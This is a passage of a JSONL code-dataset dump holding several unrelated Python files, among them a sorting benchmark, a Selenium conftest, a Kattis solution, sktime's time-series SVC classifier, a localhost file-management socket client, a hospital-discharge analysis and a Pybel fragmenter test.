lux: {}'.format(lux))\n\n lux_signal = signal('lux')\n lux_signal.send(self, lux=lux)\n","repo_name":"dashford/sentinel","sub_path":"src/Devices/Sensors/LTR559.py","file_name":"LTR559.py","file_ext":"py","file_size_in_byte":547,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"43367893372","text":"import time\nimport numpy as np\nimport pandas as pd\nfrom implementations import all_implementations\n\ndef main():\n \"\"\" Comparing the performance of the seven sorting implementations given in the 
all_implementations array: \n qs1, qs2, qs3, qs4, qs5, merge1, partition_sort.\n\n \"\"\"\n data = pd.DataFrame(columns=['sort_type', 'run_time'])\n\n for i in range(0,400):\n random_array = np.random.randint(1, 1000, size=700)\n for sort in all_implementations:\n st = time.time()\n res = sort(random_array)\n en = time.time()\n data = data.append({'sort_type': str(sort.__name__), 'run_time': (en-st)}, ignore_index=True)\n\n \n # save data\n data.to_csv('data.csv', index=False)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"KayTheGuy/data-science-in-python","sub_path":"EX6/create_data.py","file_name":"create_data.py","file_ext":"py","file_size_in_byte":782,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"10399976977","text":"from selenium import webdriver\nimport pytest\nfrom selenium.webdriver.chrome.service import Service\n\n\n@pytest.fixture()\ndef setup():\n # s = Service(\"D:\\\\Automation\\\\chromedriver_win32\\\\chromedriver.exe\")\n # driver = webdriver.Chrome(service=s)\n driver = webdriver.Chrome(\"C:\\\\chromedriver.exe\")\n return driver\n\n# Pytest HTML Reporting\n\ndef pytest_configure(config):\n config._metadata['Project Name'] = 'QA Automation Framework Reporting'\n config._metadata['Module Name'] = 'Module Name Framework'\n config._metadata['Tester'] = 'M Mubeen'\n\n@pytest.mark.optionalhook\ndef pytest_metadata(metadata):\n metadata.pop(\"JAVA_HOME\", None)\n metadata.pop(\"Plugins\", None)","repo_name":"Muhammad-Mubeen/Quixel-Automation-Task","sub_path":"testCases/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":685,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"27612878102","text":"# https://open.kattis.com/problems/dunglish\n# Time: 2022-09-09 10:07:41\n# title: Dunglish\n# language: Python 3\n\n\nn = int(input())\na = input().split()\nb = {}\nu = {}\nfor i in a:\n if i in b:\n b[i] += 1\n else:\n b[i] = 1\n u[i] = 0 \nm = int(input())\nc = []\ntrans = {}\ncor = 'correct'\nv = {}\nfor i in range(m):\n x,y,z = input().split()\n trans[x] = y\n c.append(x)\n if z == 'incorrect':\n cor = 'incorrect'\n else:\n if x in u:\n u[x] += 1\n \n if x in v:\n v[x] += 1\n else:\n v[x] = 1\n\nans1 = 1\nans2 = 1\nfor i in u:\n if i in b:\n ans1 *= u[i] ** b[i]\nfor i in v:\n if i in b:\n ans2 *= (v[i]) ** b[i]\nans2 -= ans1\n\nif ans1 == 1 and ans2 == 0:\n for i in a:\n print(trans[i], end=' ')\n print()\n print('correct')\nelif ans1 == 0 and ans2 == 1:\n for i in a:\n print(trans[i], end=' ')\n print()\n print('incorrect')\nelse:\n print(ans1, 'correct')\n print(ans2, 'incorrect')","repo_name":"mukerem/competitive-programming","sub_path":"kattis/dunglish.py","file_name":"dunglish.py","file_ext":"py","file_size_in_byte":991,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"14400534221","text":"from __future__ import print_function\nfrom __future__ import division\nfrom . 
import C_\n\nimport bibtexparser\n\n###################################################################################################################################################\n\nclass Ref():\n\tdef __init__(self, name, entry_type, info_dict,\n\t\tinvalid_attrs=None,\n\t\tuses_arxiv_format=True,\n\t\t):\n\t\tself.name = name\n\t\tself.entry_type = entry_type\n\t\tself.info_dict = info_dict.copy()\n\t\tself.attrs = self.info_dict.keys() if invalid_attrs is None else [k for k in self.info_dict.keys() if not k in invalid_attrs]\n\t\tself.uses_arxiv_format = uses_arxiv_format\n\t\tself.arxiv_id = self.info_dict.get('arxivid', None) if self.uses_arxiv_format else None\n\t\tif not self.arxiv_id is None and 'journal' in info_dict.keys():\n\t\t\tself.info_dict.pop('journal')\n\t\t#print(self.arxiv_id)\n\n\tdef __repr__(self):\n\t\ttxt = '@'+self.entry_type+'{'+self.name+',\\n'\n\t\tfor attr in self.attrs:\n\t\t\tv = self.info_dict.get(attr, None)\n\t\t\tif v is None:\n\t\t\t\tcontinue\n\t\t\tv = v.replace('{', '').replace('}', '')\n\t\t\ttxt += attr+' = {'+v+'},\\n'\n\n\t\tif not self.arxiv_id is None:\n\t\t\ttxt += 'journal = {'+f'arXiv preprint arXiv:{self.arxiv_id}'+'},\\n'\n\n\t\ttxt += '}'\n\t\treturn txt\n\nclass RefsHandler():\n\tdef __init__(self, filedir,\n\t\tinvalid_attrs=None,\n\t\t):\n\t\tself.filedir = filedir\n\t\tself.refs = []\n\t\twith open(self.filedir) as bibtex_file:\n\t\t\tref_dict = bibtexparser.load(bibtex_file).entries_dict\n\t\t\tref_names = ref_dict.keys()\n\t\t\tfor ref_name in ref_names:\n\t\t\t\tid = ref_dict[ref_name].pop('ID')\n\t\t\t\tentry_type = ref_dict[ref_name].pop('ENTRYTYPE')\n\t\t\t\td = ref_dict[ref_name]\n\t\t\t\t#print(d)\n\t\t\t\tself.refs.append(Ref(id, entry_type, d, invalid_attrs))\n\n\tdef __repr__(self):\n\t\ttxt = ''\n\t\tfor ref in self.refs:\n\t\t\ttxt += str(ref)+'\\n'\n\t\treturn txt\n\n\tdef export(self, save_rootdir):\n\t\tsave_filedir = save_rootdir+'/'+self.filedir.split('/')[-1]\n\t\t#print(save_filedir)\n\t\tprint(self, file=open(save_filedir, 'w'))","repo_name":"oscarpimentel/latex-bib-handler","sub_path":"bibhandler/handlers.py","file_name":"handlers.py","file_ext":"py","file_size_in_byte":1943,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"6220037174","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#\n# @Author: José Sánchez-Gallego (gallegoj@uw.edu)\n# @Date: 2020-08-01\n# @Filename: test_metadata.py\n# @License: BSD 3-clause (http://www.opensource.org/licenses/BSD-3-Clause)\n\nfrom sdsstools import get_metadata_files, get_package_version\n\n\ndef test_get_metadata_files(tmp_path):\n package_path = tmp_path / \"src\" / \"package\"\n package_path.mkdir(parents=True)\n\n init_path = package_path / \"__init__.py\"\n\n assert get_metadata_files(init_path) is None\n\n (tmp_path / \"setup.py\").touch()\n assert get_metadata_files(package_path) == str(tmp_path / \"setup.py\")\n assert get_metadata_files(tmp_path) == str(tmp_path / \"setup.py\")\n assert get_metadata_files(init_path) == str(tmp_path / \"setup.py\")\n\n (tmp_path / \"setup.cfg\").touch()\n assert get_metadata_files(init_path) == str(tmp_path / \"setup.cfg\")\n\n (tmp_path / \"pyproject.toml\").touch()\n assert get_metadata_files(init_path) == str(tmp_path / \"pyproject.toml\")\n\n\ndef test_get_package_version_path(tmp_path):\n package_path = tmp_path / \"src\" / \"package\"\n package_path.mkdir(parents=True)\n\n init_path = package_path / \"__init__.py\"\n\n assert 
get_package_version(path=init_path) is None\n\n setup_cfg = tmp_path / \"setup.cfg\"\n setup_cfg.touch()\n\n assert get_package_version(path=init_path) is None\n\n setup_cfg.write_text(\n \"\"\"\n[metadata]\nname = test-package\nversion = 0.4.6-alpha.0\n\"\"\"\n )\n\n assert get_package_version(path=init_path) == \"0.4.6-alpha.0\"\n assert get_package_version(path=init_path, pep_440=True) == \"0.4.6a0\"\n\n pyproject = tmp_path / \"pyproject.toml\"\n pyproject.write_text(\n \"\"\"\n[tool.poetry]\nname = \"sdsstools\"\nversion = \"0.2.2\"\n\"\"\"\n )\n\n assert get_package_version(path=init_path) == \"0.2.2\"\n\n\ndef test_get_package_version_name():\n assert get_package_version(package_name=\"pip\") is not None\n\n assert get_package_version(package_name=\"non-existing-package\") is None\n","repo_name":"sdss/sdsstools","sub_path":"test/test_metadata.py","file_name":"test_metadata.py","file_ext":"py","file_size_in_byte":1971,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"33997033580","text":"\"\"\"Support vector classifier using time series kernels..\n\nDirect wrap of sklearn SVC with added functionality that allows time series kernel to be\npassed, and uses the sktime time series classifier interface.\n\"\"\"\n\n__author__ = [\"fkiraly\"]\n__all__ = [\"TimeSeriesSVC\"]\n\nfrom inspect import signature\n\nfrom sklearn.svm import SVC\n\nfrom sktime.classification.base import BaseClassifier\n\n\nclass TimeSeriesSVC(BaseClassifier):\n \"\"\"Support Vector Classifier, for time series kernels.\n\n An adapted version of the scikit-learn SVC for time series data.\n\n Any sktime pairwise transformers are supported as kernels,\n including time series kernels and standard kernels on \"flattened\" time series.\n\n Caveat: typically, SVC literature assumes kernels to be positive semi-definite.\n However, any pairwise transformer can be passed as kernel, including distances.\n This will still produce classification results, which may or may not be performant.\n\n Parameters\n ----------\n kernel : pairwise panel transformer or callable, optional, default see below\n pairwise panel transformer inheriting from ``BasePairwiseTransformerPanel``, or\n callable, must be of signature ``(X: Panel, X2: Panel) -> np.ndarray``\n output must be mxn array if ``X`` is Panel of m Series, ``X``2 of n Series\n if ``distance_mtype`` is not set, must be able to take\n ``X``, ``X2`` which are ``pd_multiindex`` and ``numpy3D`` mtype\n default = mean Euclidean kernel, same as ``AggrDist(RBF())``,\n where ``AggrDist`` is from ``sktime`` and ``RBF`` from ``sklearn``\n kernel_params : dict, optional. default = None.\n dictionary for distance parameters, in case that distance is a callable\n kernel_mtype : str, or list of str optional. default = None.\n mtype that ``kernel`` expects for X and X2, if a callable\n only set this if ``kernel`` is not ``BasePairwiseTransformerPanel`` descendant\n C : float, default=1.0\n Regularization parameter. The strength of the regularization is\n inversely proportional to C. Must be strictly positive. The penalty\n is a squared l2 penalty.\n shrinking : bool, default=True\n Whether to use the shrinking heuristic.\n probability : bool, default=False\n Whether to enable probability estimates. 
This must be enabled prior\n to calling ``fit``, will slow down that method as it internally uses\n 5-fold cross-validation, and ``predict_proba`` may be inconsistent with\n ``predict``.\n tol : float, default=1e-3\n Tolerance for stopping criterion.\n cache_size : float, default=200\n Specify the size of the kernel cache (in MB).\n class_weight : dict or 'balanced', default=None\n Set the parameter C of class i to class_weight[i]*C for\n SVC. If not given, all classes are supposed to have\n weight one.\n The \"balanced\" mode uses the values of y to automatically adjust\n weights inversely proportional to class frequencies in the input data\n as ``n_samples / (n_classes * np.bincount(y))``.\n verbose : bool, default=False\n Enable verbose output. Note that this setting takes advantage of a\n per-process runtime setting in libsvm that, if enabled, may not work\n properly in a multithreaded context.\n max_iter : int, default=-1\n Hard limit on iterations within solver, or -1 for no limit.\n decision_function_shape : ``{'ovo', 'ovr'}``, default='ovr'\n Whether to return a one-vs-rest ('ovr') decision function of shape\n (n_samples, n_classes) as all other classifiers, or the original\n one-vs-one ('ovo') decision function of libsvm which has shape\n (n_samples, n_classes * (n_classes - 1) / 2). However, one-vs-one\n ('ovo') is always used as multi-class strategy. The parameter is\n ignored for binary classification.\n break_ties : bool, default=False\n If true, ``decision_function_shape='ovr'``, and number of classes > 2,\n :term:`predict` will break ties according to the confidence values of\n :term:`decision_function`; otherwise the first class among the tied\n classes is returned. Please note that breaking ties comes at a\n relatively high computational cost compared to a simple predict.\n random_state : int, RandomState instance or None, default=None\n Controls the pseudo random number generation for shuffling the data for\n probability estimates. 
Ignored when `probability` is False.\n Pass an int for reproducible output across multiple function calls.\n\n Examples\n --------\n >>> from sktime.classification.kernel_based import TimeSeriesSVC\n >>> from sklearn.gaussian_process.kernels import RBF\n >>> from sktime.dists_kernels import AggrDist\n >>> from sktime.datasets import load_unit_test\n >>> X_train, y_train = load_unit_test(return_X_y=True, split=\"train\")\n >>> X_test, y_test = load_unit_test(return_X_y=True, split=\"test\")\n >>>\n >>> mean_gaussian_tskernel = AggrDist(RBF())\n >>> classifier = TimeSeriesSVC(kernel=mean_gaussian_tskernel)\n >>> classifier.fit(X_train, y_train)\n TimeSeriesSVC(...)\n >>> y_pred = classifier.predict(X_test)\n \"\"\"\n\n _tags = {\n \"capability:multivariate\": True,\n \"capability:unequal_length\": True,\n \"capability:missing_values\": True,\n \"capability:predict_proba\": True,\n \"X_inner_mtype\": [\"pd-multiindex\", \"numpy3D\"],\n \"classifier_type\": \"kernel\",\n }\n\n DELEGATED_PARAMS = [\n \"C\",\n \"shrinking\",\n \"probability\",\n \"tol\",\n \"cache_size\",\n \"class_weight\",\n \"verbose\",\n \"max_iter\",\n \"decision_function_shape\",\n \"break_ties\",\n \"random_state\",\n ]\n\n def __init__(\n self,\n kernel=None,\n kernel_params=None,\n kernel_mtype=None,\n C=1,\n shrinking=True,\n probability=False,\n tol=1e-3,\n cache_size=200,\n class_weight=None,\n verbose=False,\n max_iter=-1,\n decision_function_shape=\"ovr\",\n break_ties=False,\n random_state=None,\n ):\n self.kernel = kernel\n self.kernel_params = kernel_params\n self.kernel_mtype = kernel_mtype\n\n # naive dict comprehension does not work due to context of eval\n delegated_param_dict = {}\n for key in self.DELEGATED_PARAMS:\n delegated_param_dict[key] = eval(key)\n\n for key, val in delegated_param_dict.items():\n setattr(self, key, val)\n\n super().__init__()\n\n self.svc_estimator_ = SVC(kernel=\"precomputed\", **delegated_param_dict)\n\n if kernel_mtype is not None:\n self.set_tags(X_inner_mtype=kernel_mtype)\n\n from sktime.dists_kernels import BasePairwiseTransformerPanel\n\n # inherit capability tags from distance, if it is an estimator\n if isinstance(kernel, BasePairwiseTransformerPanel):\n inherit_tags = [\n \"capability:missing_values\",\n \"capability:unequal_length\",\n \"capability:multivariate\",\n ]\n self.clone_tags(kernel, inherit_tags)\n\n def _kernel(self, X, X2=None):\n \"\"\"Compute distance - unified interface to kernel callable.\"\"\"\n kernel = self.kernel\n kernel_params = self.kernel_params\n if kernel_params is None:\n kernel_params = {}\n\n if kernel is None:\n from sklearn.gaussian_process.kernels import RBF\n\n from sktime.dists_kernels.compose_tab_to_panel import AggrDist\n\n kernel = AggrDist(RBF())\n\n if X2 is not None:\n return kernel(X, X2, **kernel_params)\n # if X2 is None, check if kernel allows None X2 to mean \"X2=X\"\n else:\n sig = signature(kernel).parameters\n X2_sig = sig[list(sig.keys())[1]]\n if X2_sig.default is not None:\n return kernel(X, X2, **kernel_params)\n else:\n return kernel(X, **kernel_params)\n\n def _fit(self, X, y):\n \"\"\"Fit the model using X as training data and y as target values.\n\n Parameters\n ----------\n X : sktime compatible Panel data container, of mtype X_inner_mtype,\n with n time series to fit the estimator to\n y : {array-like, sparse matrix}\n Target values of shape = [n]\n \"\"\"\n # store full data as indexed X\n self._X = X\n\n kernel_mat = self._kernel(X)\n\n self.svc_estimator_.fit(kernel_mat, y)\n\n return self\n\n def 
_predict(self, X):\n \"\"\"Predict the class labels for the provided data.\n\n Parameters\n ----------\n X : sktime-compatible Panel data, of mtype X_inner_mtype, with n_samples series\n data to predict class labels for\n\n Returns\n -------\n y : array of shape [n_samples] or [n_samples, n_outputs]\n Class labels for each data sample.\n \"\"\"\n # self._X should be the stored _X\n kernel_mat = self._kernel(X, self._X)\n\n y_pred = self.svc_estimator_.predict(kernel_mat)\n\n return y_pred\n\n def _predict_proba(self, X):\n \"\"\"Return probability estimates for the test data X.\n\n Parameters\n ----------\n X : sktime-compatible Panel data, of mtype X_inner_mtype, with n_samples series\n data to predict class labels for\n\n Returns\n -------\n p : array of shape = [n_samples, n_classes], or a list of n_outputs\n of such arrays if n_outputs > 1.\n The class probabilities of the input samples. Classes are ordered\n by lexicographic order.\n \"\"\"\n # self._X should be the stored _X\n kernel_mat = self._kernel(X, self._X)\n\n y_pred = self.svc_estimator_.predict_proba(kernel_mat)\n\n return y_pred\n\n @classmethod\n def get_test_params(cls, parameter_set=\"default\"):\n \"\"\"Return testing parameter settings for the estimator.\n\n Parameters\n ----------\n parameter_set : str, default=\"default\"\n Name of the set of test parameters to return, for use in tests. If no\n special parameters are defined for a value, will return `\"default\"` set.\n For classifiers, a \"default\" set of parameters should be provided for\n general testing, and a \"results_comparison\" set for comparing against\n previously recorded results if the general set does not produce suitable\n probabilities to compare against.\n\n Returns\n -------\n params : dict or list of dict, default={}\n Parameters to create testing instances of the class.\n Each dict are parameters to construct an \"interesting\" test instance, i.e.,\n `MyClass(**params)` or `MyClass(**params[i])` creates a valid test instance.\n `create_test_instance` uses the first (or only) dictionary in `params`.\n \"\"\"\n # testing that callables/classes can be passed\n from sktime.dists_kernels.compose_tab_to_panel import FlatDist\n\n # probability must be True, or predict_proba will not work\n dist1 = FlatDist.create_test_instance()\n params1 = {\"kernel\": dist1, \"probability\": True}\n\n # testing the default kernel\n params2 = {\"probability\": True}\n\n return [params1, params2]\n","repo_name":"sktime/sktime","sub_path":"sktime/classification/kernel_based/_svc.py","file_name":"_svc.py","file_ext":"py","file_size_in_byte":11435,"program_lang":"python","lang":"en","doc_type":"code","stars":7028,"dataset":"github-code","pt":"52"} +{"seq_id":"71409196006","text":"import socket\n\nclient = socket.socket()\nclient.connect(('localhost',9999)) #can be given any IP address\nmsg=client.recv(1024).decode()\nprint(msg)\n\nwhile True:\n\tchoice = input(\"1. Create a file\\n 2. Delete a file\\n 3. Edit a file\\n 4. Read a file\\n 5. 
End connection\\n Enter a choice: \")\n\t\n\tif choice == \"1\":\n\t\tclient.send(bytes(\"1\",\"utf-8\"))\n\t\tfile = input(\"Enter file name: \")\n\t\tclient.send(bytes(file,\"utf-8\"))\n\t\tprint_msg=client.recv(1024).decode()\n\t\tprint(print_msg)\n\t\tprint(\"\\n\")\n\n\telif choice == \"2\":\n\t\tclient.send(bytes(\"2\",\"utf-8\"))\n\t\tfile = input(\"Enter file name: \")\n\t\tclient.send(bytes(file,\"utf-8\"))\n\t\tprint_msg=client.recv(1024).decode()\n\t\tprint(print_msg)\n\t\tprint(\"\\n\")\n\n\telif choice == \"3\":\n\t\tclient.send(bytes(\"3\",\"utf-8\"))\n\t\tfile = input(\"Enter file name: \")\n\t\tclient.send(bytes(file,\"utf-8\"))\n\t\tcontent = input(\"Enter the text to be added: \")\n\t\tclient.send(bytes(content,\"utf-8\"))\n\t\tprint_msg=client.recv(1024).decode()\n\t\tprint(print_msg)\n\t\tprint(\"\\n\")\n\n\telif choice == \"4\":\n\t\tclient.send(bytes(\"4\",\"utf-8\"))\n\t\tfile = input(\"Enter file name: \")\n\t\tclient.send(bytes(file,\"utf-8\"))\n\t\tprint_msg=client.recv(1024).decode()\n\t\tprint(print_msg)\n\t\tprint(\"\\n\")\n\n\telif choice == \"5\":\n\t\tclient.send(bytes(\"5\",\"utf-8\"))\n\t\tprint(\"The connection has been ended.\")\n\t\tquit()\n\n\telse:\n\t\tprint(\"Invalid choice!\")\n\n","repo_name":"aneeta001/CN-project","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":1313,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"349892274","text":"# This descriptive analysis should be detailed enough \n# so a physician or nurse could understand what information\n# is contained in the dataset, and what potentially questions \n# might be asked and answered. \n\n############# IMPORT PACKAGES ###########\nimport pandas as pd\nimport numpy as np\nimport researchpy as rp\nfrom scipy import stats \nfrom tableone import TableOne, load_dataset\n########################################\n\n\n\n\n############# IMPORT DATASET ###########\nHospital_Inpatient_Discharges = pd.read_csv('/Users/brittanykusi-gyabaah/Downloads/Hospital_Inpatient_Discharges__SPARCS_De-Identified___2016.csv')\nHospital_Inpatient_Discharges.columns = Hospital_Inpatient_Discharges.columns.str.replace('[^A-Za-z0-9]+', '_')\nHospital_Inpatient_Discharges.info()\n########################################\n\n# Link Facility ID to Facilty's name\nFacility = pd.pivot_table(Hospital_Inpatient_Discharges, values=['Facility_Name'], index='Facility_Id', columns=None, aggfunc=np.sum)\nprint(Facility)\n\n# Link DRG Code to its description\nAPR_DRG = pd.pivot_table(Hospital_Inpatient_Discharges, values=['APR_DRG_Description'], index='APR_DRG_Code', columns=None, aggfunc=np.sum)\nprint(APR_DRG)\n\n\n\n\n######## CREATE SMALLER TABLE ###########\nHID = Hospital_Inpatient_Discharges[['Facility_Id', 'Age_Group', 'Gender', \n 'Type_of_Admission', 'APR_DRG_Description', \n 'Total_Charges', 'Length_of_Stay']]\nHID.dtypes\n#remove all commas within each column\nHID.replace(',','', regex=True, inplace=True)\nHID['Total_Charges'] = HID['Total_Charges'].astype(float)\nHID.dtypes\n#########################################\n\n# What are the top 50 facilities with the highest amount of discharges in 2016?\nHCounts = HID['Facility_Id'].value_counts()\nHCounts.head(50)\n# Relative frequency of facility discharges\nHID.Facility_Id.value_counts(normalize=True)*100\n\n\n\n\n##### Let's focus on Facility 1169 ######\n# facility 1169 had the highest frequency \n# discharges within the year 2016.\nHID1169 = 
HID[HID.Facility_Id.isin([\"1169\"])]\n#########################################\n\n# What is the mean of total charges for facility 1,169?\nHID1169['Total_Charges'] = HID1169['Total_Charges'].astype(float)\nHID1169.dtypes\nHID1169.Total_Charges.mean()\n\n# What is the mode for APR_DRG_Descriptions and type of admission? \nAPR_mode = HID1169.APR_DRG_Description.value_counts()\nAPR_mode.head(50)\n# the most frequent reason for visits --> Neonate birthwt >2499g, normal newborn or neonate w other problem\nType_of_Admission_mode = HID1169.Type_of_Admission.value_counts()\nType_of_Admission_mode.head(50)\n# emergency visits were the highest\n\n\n\n\n################# TABLE0NE TABLE #################\nHID1169_clone = HID1169\nHID1169_clone.dtypes\nlist(HID1169_clone)\nHID1169_clone.head(5)\nHID1169_clone['APR_DRG_Description']\nHID1169_clone_columns = ['Facility_Id', 'Age_Group', 'Gender', \n 'Type_of_Admission', 'APR_DRG_Description', \n 'Total_Charges', 'Length_of_Stay']\nHID1169_clone_categories=['Gender', 'Type_of_Admission', 'APR_DRG_Description', 'Age_Group', 'Length_of_Stay']\nHID1169_clone_groupby = ['Facility_Id']\nHID1169_clone['Gender'].value_counts()\nHID1169_clone_table1 = TableOne(HID1169_clone, columns=HID1169_clone_columns, \n categorical=HID1169_clone_categories, groupby=HID1169_clone_groupby, pval=False)\nprint(HID1169_clone_table1.tabulate(tablefmt = \"fancy_grid\"))\nHID1169_clone_table1.to_csv('/Users/brittanykusi-gyabaah/Documents/GitHub/descriptives-nydischarges/data.csv')\n","repo_name":"Brittanykusi/descriptives-nydischarges","sub_path":"Script/nydischarges.py","file_name":"nydischarges.py","file_ext":"py","file_size_in_byte":3504,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"333418723","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Aug 02 23:39:19 2016\r\n\r\n@author: ilaponog\r\n\"\"\"\r\n\r\nimport pybel;\r\nimport openbabel;\r\nimport Fragmenter_V2 as fg;\r\nimport os;\r\n\r\ndef PybelModel_To_Fragmenter(mol):\r\n \r\n atoms=[];atomsXYZ=[];\r\n for i in mol.atoms:\r\n aname=i.type;\r\n if aname[-1:] in '0123456789':\r\n aname=aname[:-1];\r\n if i.OBAtom.IsAromatic():\r\n ar=1;\r\n aname=aname.replace('ar','');\r\n else:\r\n ar=0;\r\n isotope=0;\r\n '''\r\n Place isotope treatment block here...... 
To be added.....\r\n \r\n '''\r\n atoms.append([i.OBAtom.GetExactMass(),aname,isotope, i.formalcharge,ar]);\r\n atomsXYZ.append([i.OBAtom.GetX(),i.OBAtom.GetY(),i.OBAtom.GetZ()])\r\n bonds=[];\r\n for pb in openbabel.OBMolBondIter( mol.OBMol):\r\n if pb.IsAromatic():\r\n bo=4;\r\n else:\r\n bo=pb.GetBondOrder();\r\n i=pb.GetBeginAtomIdx()-1;\r\n j=pb.GetEndAtomIdx()-1;\r\n bonds.append([i,j,bo]);\r\n forces=[1.0]*len(atoms);\r\n '''\r\n Place force estimations here if needed.\r\n '''\r\n return [atoms,forces,bonds,atomsXYZ];\r\n \r\n\r\ndef FragmenterHTML_Generate(out_path,out_name,fragmenter,title='Fragmenter Results'): \r\n cc=0;\r\n if not os.path.exists(out_path+'/'+out_name):\r\n os.makedirs(out_path+'/'+out_name);\r\n fout=open(out_path+'/'+out_name+'.html','w');\r\n \r\n fout.write('\\n');\r\n fout.write('\\n');\r\n fout.write('\\n');\r\n fout.write('%s\\n'%title);\r\n fout.write('\\n');\r\n fout.write('\\n');\r\n fout.write('\\n');\r\n fout.write('\\n');\r\n\r\n \r\n for i in fragmenter.Fragments:\r\n fout.write('\\n');\r\n fout.write('\\n'%i[0]);\r\n if len(i)>1:\r\n for j in i[1]:\r\n #fout.write('\\n'%j);\r\n sdf=fragmenter.GenerateSDFFromAtomNumbers(j);\r\n mol2=pybel.readstring('sdf',sdf);\r\n mol2.title='';\r\n \r\n cc+=1;\r\n filename=out_name+'/%s.png'%cc;\r\n print(filename);\r\n \r\n \r\n \r\n \r\n #mol2.make3D();\r\n mol2.draw(show=False,filename=filename,usecoords=False);\r\n mm2=mol2.exactmass; \r\n \r\n mm=0.0;hh=0;\r\n for atom in mol2.atoms:\r\n mm+=atom.exactmass;\r\n \r\n \r\n v=atom.OBAtom.GetValence();\r\n vv=atom.OBAtom.GetImplicitValence();\r\n hh+=vv-v;\r\n \r\n \r\n #mol2.addh();\r\n #mm=mol2.exactmass-mm;\r\n \r\n fout.write('\\n');\r\n \r\n \r\n \r\n fout.write('\\n');\r\n \r\n \r\n \r\n fout.write('
%12.3f%s SMILES: %s -%s x [H] Mass: %10.3f Mass2: %10.3f '%(filename,mol2.write('smi'),hh,mm,mm2));\r\n \r\n #for atom in mol2.atoms:\r\n # v=atom.OBAtom.GetValence();\r\n # vv=atom.OBAtom.GetImplicitValence();\r\n # atom.OBAtom.SetImplicitValence(v);\r\n # vv=atom.OBAtom.GetImplicitValence();\r\n # fout.write(' Valence %s ImplicitValence: %s '%(v,vv));\r\n \r\n \r\n \r\n fout.write('
\\n');\r\n\r\n \r\n\r\n\r\n fout.write('\\n');\r\n fout.write(' \\n');\r\n \r\n #for i in fragmenter.GroupAtomNumbers:\r\n # if len(i)>groupY:\r\n # groupY=len(i);\r\n \r\n \r\n fout.close();\r\n \r\n\r\n#-------------------------------------------------------------------------------\r\nif __name__=='__main__':\r\n \r\n mol=pybel.readstring('smi','c1cnccc1C=CC#CC');\r\n mol.addh();\r\n mol.make3D();\r\n atoms,forces,bonds,atomsXYZ=PybelModel_To_Fragmenter(mol);\r\n \r\n frag=fg.FragmenterBasic(atoms,forces,bonds,atomsXYZ,0.0,True,2,True);\r\n frag.SortResults(False);\r\n print(frag.Fragments);\r\n if frag.ReturnAtomNumbers:\r\n sdf=frag.GenerateSDFFromAtomNumbers(frag.Fragments[len(frag.Fragments)-1][1][0]);\r\n print(sdf);\r\n mol2=pybel.readstring('sdf',sdf);\r\n print(mol.write('inchi')); \r\n print(mol2.write('inchi'));\r\n currentpath=os.path.dirname(os.path.realpath(__file__)).replace('\\\\','/');\r\n print(currentpath);\r\n FragmenterHTML_Generate(currentpath,'FragResults',frag,'FragmenterBasic');\r\n \r\n \r\n #for i in frg[2]:\r\n # print(\"%s%s-%s%s\"%(frg[0][i[0]][1],i[0],frg[0][i[1]][1],i[1]));\r\n\r\n atoms=[[12.0,'C',0,0,0], [12.0,'C',0,0,0], [12.0,'C',0,0,0], [12.0,'C',0,0,0], [12.0,'C',0,0,0], [12.0,'C',0,0,0], [14.003074,'N',0,0,0], [12.0,'C',0,0,0], [14.003074,'N',0,0,0], [14.003074,'N',0,0,0], [1.007825,'H',0,0,0], [1.007825,'H',0,0,0], [1.007825,'H',0,0,0], [1.007825,'H',0,0,0], [1.007825,'H',0,0,0], [1.007825,'H',0,0,0], [1.007825,'H',0,0,0], [1.007825,'H',0,0,0], [1.007825,'H',0,0,0]];\r\n forces=[0.007588212767180424, 0.006661618572088917, 0.009570650970545316, 0.019269484295123207, 0.08017421296776164, 0.0144983061079562, 0.06769232697285564, 0.1374647546245946, 0.03697424664546933, 0.0315693346778167, 0.007913059711641258, 0.0006550076335433046, 0.0005430184158939733, 0.0007928871294200714, 0.0026211724475890554, 0.010472723714488033, 0.008070656478874566, 0.03771033870174066, 0.0335120686022215];\r\n bonds=[[0, 1, 4], [0, 5, 4], [0, 11, 1], [1, 2, 4], [1, 12, 1], [2, 3, 4], [2, 13, 1], [3, 4, 4], [3, 9, 1], [4, 5, 4], [4, 6, 1], [5, 14, 1], [6, 7, 1], [6, 17, 1], [6, 18, 1], [7, 8, 1], [7, 9, 1], [8, 15, 1], [8, 16, 1], [9, 10, 1]];\r\n \r\n frag=fg.FragmenterBasic(atoms,forces,bonds,breakage_threshold=0.5,breakage_threshold_absolute=False,fragmentation_depth=2,Group_Atom_Numbers=True);\r\n \r\n frag.SortResults(Ascending=True);\r\n print(frag.Fragments);\r\n if frag.ReturnAtomNumbers:\r\n sdf=frag.GenerateSDFFromAtomNumbers(frag.Fragments[len(frag.Fragments)-1][1][0]);\r\n print(sdf);\r\n mol2=pybel.readstring('sdf',sdf);\r\n print(mol.write('inchi')); \r\n print(mol2.write('inchi'));\r\n currentpath=os.path.dirname(os.path.realpath(__file__)).replace('\\\\','/');\r\n print(currentpath);\r\n FragmenterHTML_Generate(currentpath,'FragResults2',frag,'FragmenterBasic');\r\n \r\n\r\n","repo_name":"emiliecauet/Fukui","sub_path":"Fragmenter/PybelTest.py","file_name":"PybelTest.py","file_ext":"py","file_size_in_byte":6635,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"27928921001","text":"from typing import List\n\nfrom advent_of_code import static_files\n\n\ndef max_calories(ledger: List[str], number_of_elves: int = None):\n elves = 